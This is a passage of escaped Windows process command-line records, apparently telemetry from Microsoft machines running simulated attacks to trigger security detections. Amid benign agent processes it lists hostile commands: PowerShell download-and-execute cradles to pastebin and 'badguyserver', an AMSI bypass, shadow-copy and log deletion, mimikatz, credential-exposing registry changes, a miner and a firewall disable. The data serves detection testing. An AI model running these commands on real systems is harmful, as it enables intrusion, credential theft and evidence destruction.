\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe  -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set opmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com abc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" 